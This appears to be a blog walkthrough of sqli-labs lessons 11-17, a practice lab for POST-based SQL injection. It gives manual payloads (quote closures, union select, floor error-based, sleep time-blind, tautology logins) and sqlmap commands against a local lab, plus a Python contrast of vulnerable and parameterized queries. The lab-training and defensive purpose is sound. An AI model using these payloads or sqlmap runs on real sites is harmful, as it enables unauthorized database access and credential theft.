sqli-labs 11-17 (manual injection + sqlmap)

These lessons are all POST-type injection. Compared with the earlier GET-type lessons, only the test point differs (the form fields instead of the URL); the method is the same.

0x01 sqli-labs less-11

1. Manual injection

Since the injection type is POST, we cannot enter data in the URL; instead we enter it in the form. The POST data forms the request body, which can also be captured, and part of that data is spliced into the SQL statement.

Enter 1' as the username and anything as the password; an SQL error is reported.

So there is SQL injection at the username. Appending the comment --+ still gives an error; appending # echoes normally, so the closure succeeds.

' order by 3 # gives an error, ' order by 2 # displays normally.

Query the database: ' union select database(),2 #

The rest is the same as the first lesson.

2. sqlmap injection

Capture with Burp, then keep the data part of the request for sqlmap.

sqlmap statement:

python sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-11/?id=1" --data "uname=1&passwd=11&submit=Submit" --technique SIU --dbms mysql --dbs --threads 8

Of these:

--data: the data segment to append (POST and GET are both possible)

--threads: maximum number of concurrent threads; in blind injection each thread fetches one character (7 in this request), and the result is completed after the threads finish. The default is 1; it is recommended not to exceed 10, otherwise it may affect the availability of the site.

--batch is not used here, because there is no option to choose.

Otherwise it is very slow.

0x02 sqli-labs less-12

1. Manual injection

Enter 1' as the username and anything as the password: no error. Enter 1": error, so the closure should be double quotes.

Adding the # comment still gives an error, so it is not closed. Looking at the error message, parentheses are found.

So with the parentheses, the username is: 1") #, password anything; the echo is correct. Then try union select.

The rest is the normal operation.

2. sqlmap injection

We fill the closure rule we worked out manually (the universal password) plus the comment character into the corresponding parameters of the data.

python sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-12/?id=1" --data "uname=")or ("1")=("1&passwd=1")or("1")=("1&submit=Submit" --technique US --dbms mysql --dbs --threads 8

0x03 sqli-labs less-13

1. Manual injection

The closure rule is: ') #

Input ') union select 1,2 #: no display position is found, but there is an error message, so error-based injection is used.

The following error-based injection is the normal operation.

2. sqlmap injection

We enter the universal password in the two parameters of the regular injection data, which cracks faster.

python sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-13/?id=1" --data "uname=')or('1')=('1 &passwd=')or('1')=('1&submit=Submit" --dbs --threads 8  --technique E --dbms mysql

0x04 sqli-labs less-14

1. Manual injection

Enter " and an SQL error is reported; enter "# and it closes successfully, so the closure rule is: "#

Writing union select 1,2 inside the rule, a correct query shows nothing and only errors, so error-based injection is used again.

Then the regular error-based injection operations.

2. sqlmap injection

python sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-14/?id=1" --data "uname=1&passwd=1&submit=Submit" --dbs --threads 8 --technique E --dbms mysql

0x05 sqli-labs less-15

1. Manual injection

There is no error message; trying 1' and sleep(5)# does not work either.

The username probably has to be correct to log in; trying admin' and sleep(5)#, a 5-second delay is observed.

Refer to the time-based blind injection operation from lesson 9.

2. sqlmap injection

python sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-15/?id=1" --data "uname=admin'or'1'='1&passwd='or'1'='1&submit=Submit" --current-db --threads 8 --technique T
or
python sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-15/?id=1" --data "uname=admin&passwd=1&submit=Submit" --current-db --threads 8 --technique T

0x06 sqli-labs less-16

Change the ' in the closure rule to "; the rest is the same as lesson 15.

0x07 sqli-labs less-17

1. Manual injection

Single and double quotes in the user name give no error, so look at the source code.

The password is not checked, but uname is checked first, so our username must be correct. Here we choose brute forcing to obtain the username; the username here is admin.

So fill in admin as the username. Entering ' as the password gives an error; entering '# displays normally. The normal display has no echo position, so floor error-based injection is used.

Constructed statement: ' and (select 1 from (select count(*),concat((database()),floor(rand(0)*2))x from information_schema.tables group by x)a)#

Then the regular error-based injection operations.

2. sqlmap injection

python sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-17/" --data "uname=admin&passwd=password&submit=Submit" --current-db --threads 8 --technique E
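The login query shape that lessons 11 and 15 above exploit, beside its parameterized fix, as an added example that is not code from sqli-labs or from this post. It assumes an in-memory sqlite3 database with a constructed users table standing in for the lab's MySQL one (sqlite has no # comment, so the Less-15 universal-password payload is reused rather than the # payloads).

```python
import sqlite3


def make_db():
    """Constructed in-memory users table standing in for the lab's MySQL table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'correct-horse')")
    return conn


def login_vulnerable(conn, uname, passwd):
    """Form fields spliced straight into the SQL text, as in Less-11/15."""
    sql = (f"SELECT username FROM users "
           f"WHERE username='{uname}' AND password='{passwd}'")
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_parameterized(conn, uname, passwd):
    """Same query with bound parameters: a quote in the input is data, not syntax."""
    sql = "SELECT username FROM users WHERE username=? AND password=?"
    row = conn.execute(sql, (uname, passwd)).fetchone()
    return row[0] if row else None


def probe_raises(conn, uname, passwd="x"):
    """The walkthrough's first check: does a lone quote break the statement?"""
    try:
        login_vulnerable(conn, uname, passwd)
        return False
    except sqlite3.OperationalError:
        return True


def demo():
    conn = make_db()
    # The Less-15 universal-password payload from the walkthrough.
    uname, passwd = "admin'or'1'='1", "'or'1'='1"
    return {
        "vulnerable_bypassed": login_vulnerable(conn, uname, passwd),
        "parameterized_bypassed": login_parameterized(conn, uname, passwd),
        "parameterized_valid": login_parameterized(conn, "admin", "correct-horse"),
    }


if __name__ == "__main__":
    print(demo())
```

With the tautology payload the concatenated query returns the admin row without a password, while the bound-parameter version returns nothing; the same "1'" probe that makes the lab print an SQL error raises an OperationalError here.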


Origin www.cnblogs.com/-chenxs/p/11608911.html